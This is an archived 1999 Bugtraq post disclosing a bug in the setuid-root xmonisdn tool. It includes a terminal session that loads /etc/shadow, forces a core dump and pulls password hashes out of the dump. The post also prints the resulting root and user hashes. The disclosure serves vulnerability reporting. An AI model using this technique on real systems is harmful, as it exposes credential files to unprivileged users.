Bugtraq mailing list archives

xmonisdn (isdn4k-utils/Linux) bug report

From: ronvdaal () SYNTONIC NET (Ron van Daal)
Date: Tue, 19 Oct 1999 02:44:04 +0200


Hello,

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.

I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
[[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap

[1]+  Stopped                 xmonisdn -file /etc/shadow
[[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[[syntonix@damien bin]# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
[[syntonix@damien bin]# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:10878:0:99999:7:::
uucp:*:10878:0:99999:7:::
operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal () syntonic net | www.syntonic.net  | fax. +31(0)46-4230739

Current thread:

Re: execve bug linux-2.2.12, (continued)
- - - Re: execve bug linux-2.2.12 Matt Chapman (Oct 18)
    - Re: execve bug linux-2.2.12 Taneli Huuskonen (Oct 19)
    - Re: execve bug linux-2.2.12 Alan Cox (Oct 20)
    - Microsoft Security Bulletin (MS99-044) Aleph One (Oct 20)
    - Re: execve bug linux-2.2.12 Timo Felbinger (Oct 20)
    - CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Aleph One (Oct 20)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Richard Trott (Oct 20)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Chad Price (Oct 21)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Gregory A Lundberg (Oct 21)
    - Remote DoS in Axent's Raptor 6.0 Mike Frantzen (Oct 20)
    - xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 18)
    - Re: xmonisdn (isdn4k-utils/Linux) bug report Jan-Hendrik Terstegge (Oct 20)
    - Last weeks release: whisker (new web scanner) rfp () WIRETRIP NET (Oct 20)
    - Re: xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 20)
    - Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Olaf Selke (Oct 20)
    - DoS in Eicon ISDN Modem is now fixed Aviram Jenik (Oct 20)
  - Re: execve bug linux-2.2.12 security () XIRR COM (Oct 16)
  - Microsoft Security Bulletin (MS99-043) Aleph One (Oct 18)
    - Re: Microsoft Security Bulletin (MS99-043) David Schwartz (Oct 18)